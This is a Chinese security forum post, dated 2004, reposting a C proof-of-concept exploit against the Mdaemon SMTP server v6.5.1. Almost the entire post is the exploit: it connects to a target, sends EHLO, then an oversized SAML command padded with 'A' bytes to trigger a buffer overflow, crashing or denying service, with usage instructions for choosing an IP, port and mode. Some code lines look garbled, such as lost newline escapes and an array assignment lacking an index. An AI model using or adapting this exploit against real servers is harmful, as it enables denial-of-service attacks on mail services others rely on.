Remote DoS proof of concept exp Mdaemon SMTP server v6.5.1

冰血封情

老林

团队决策人

Rank: 9 Rank: 9 Rank: 9

E.S.T运营责任人

帖子: 6825
精华: 834
积分: 36073
阅读权限: 255
性别: 男
来自: 中国
在线时间: 590 小时
注册时间: 2004-6-25
最后登录: 2008-10-6

优秀管理奖资料收集奖原创技术奖核心建议奖

发短消息
加为好友
当前离线

楼主大中小发表于 2004-10-2 00:57 只看该作者

Remote DoS proof of concept exp Mdaemon SMTP server v6.5.1

文章作者： D_BuG

Remote denial of service proof of concept exploit that makes use of a buffer overflow in Mdaemon SMTP server version 6.5.1

复制内容到剪贴板

代码:

///////////////////////////////////////////////////////////// 

//      Remote DoS and proof-of-concept exploit        // 

//                 for             // 

//          Mdaemon smtp server v6.5.1            // 

//             and                    // 

//            possible other version.             // 

//             Find bug: D_BuG.        // 

//              Author: D_BuG.                // 

//              [email]D_BuG@bk.ru[/email]          //            

//             Data: 16/09/2004        // 

//              NOT PUBLIC!                 // 

//     Greets:Rasco.                 // 

///////////////////////////////////////////////////////////// 



#include <stdio.h> 

#include <stdlib.h> 

#include <sys/types.h> 

#include <unistd.h> 

#include <sys/socket.h> 

#include <netinet/in.h> 



int    sock,err; 

struct  sockaddr_in sa; 





int main (int argc, char *argv[]) 



{ 



printf("Remote DoS and proof-of-concept(buffer overflow) exploitn"); 

printf("                 for                     n"); 

printf("Mdaemon smtp server v6.5.1 and possible other version.n");              

if(argc!=4) 

{ 

printf("Usage: %s <IPADDRESS> <PORT> <TARGET>n",argv[0]); 

printf("Target:n1.DoS.n2.Proof-of-concept(buffer overflow).n"); 

printf("e.g.:%s 192.168.1.1 25 1n",argv[0]); 

exit(-1); 

} 





   sa.sin_family=AF_INET; 

sa.sin_port=htons(atoi(argv[2])); 

if(inet_pton(AF_INET, argv[1], &sa.sin_addr) <= 0) 

printf("Error inet_ptonn"); 



sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP); 



printf("[~]Connecting...n"); 



if(connect(sock,(struct sockaddr *)&sa,sizeof(sa)) <0) 

{ 

printf("[-]Connect filed....nExit...n"); 

exit(-1); 

} 



int len=247; 



if(atoi(argv[3])==2) 

{ 

len++; 

} 



char szBuffer[len+7]; 

char buff[len]; 

char send[]="EHLO testern"; 

char send3[]="RCPT TO postmastern"; 

char rcv[1024]; 

int i; 

for(i=0;i<len;i++) 

   { 

   buff=0x41; 

   } 

   

sprintf(szBuffer,"SAML %sn",buff); 



printf("[+]Ok!n"); 

sleep(2); 

printf("[~]Get banner...n"); 

if(read(sock,&rcv,sizeof(rcv)) !=-1){} 

   

if(strstr(rcv,"220")==NULL) 

{ 

printf("[-]Failed!n"); 

} 

else 

{ 

printf("[+]Ok!n"); 

   } 



printf("[~]Send EHLO...n"); 

write(sock,send,sizeof(send)-1); 

sleep(2); 

memset(rcv,0,1024); 

if(read(sock,&rcv,sizeof(rcv)) !=-1){} 



if(strstr(rcv,"250")==NULL) 

{ 

printf("[-]Failed...n"); 

} 

else 

{ 

printf("[+]Ok!n"); 

} 

printf("[~]Send SAML...n"); 

write(sock,szBuffer,strlen(szBuffer));//Send SAML 

sleep(2); 

memset(rcv,0,1024); 

if(read(sock,&rcv,sizeof(rcv)) !=-1){} 



if(strstr(rcv,"250")==NULL) 

{ 

printf("[-]Exploit failed...please check your version Mdaemon!n"); 

printf("[-]Exit...n"); 

exit(-1); 

} 

printf("[+]Ok!n"); 



printf("[~]Send RCPT...nn"); 

write(sock,send3,sizeof(send3)-1);//Send RCPT 

sleep(2); 

if(atoi(argv[3])==2) 

{ 

printf("[+]Crash service.....n"); 

} 

else 

{ 

printf("[+]DoS service.....n"); 

} 

printf("[~]Done.n"); 



close(sock); 



return 0; 



}

qq310926是我唯一用号，除此之外有其他号码号自称邪八冰血封情，则非本人。

TOP

‹‹ 上一主题 | 下一主题 ››

邪恶八进制信息安全团队技术讨论组 » 安全测试代码{ Exploits and Shellcode } » Remote DoS proof of concept exp Mdaemon SMTP server v6.5.1